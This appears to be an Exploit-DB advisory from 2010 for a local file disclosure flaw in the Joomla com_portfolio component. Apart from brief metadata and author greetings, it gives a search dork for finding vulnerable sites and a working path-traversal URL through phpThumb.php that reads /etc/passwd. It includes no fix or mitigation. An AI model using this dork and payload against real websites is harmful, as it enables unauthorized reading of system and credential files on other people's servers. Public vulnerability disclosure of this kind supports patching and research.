Joomla! Component com_portfolio - Local File Disclosure

EDB-ID:

12325

CVE:





Platform:

PHP

Date:

2010-04-21


Joomla compnent com_portfolio Local File Disclosure

author : Mr.tro0oqy from comunity college :(

email : t.4@windowslive.com

greetz:alzomer , Mr.ksoory , R3d-D3vil from palstine .. 

dork :inurl:index.php?option=com_portfolio

exp:

http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd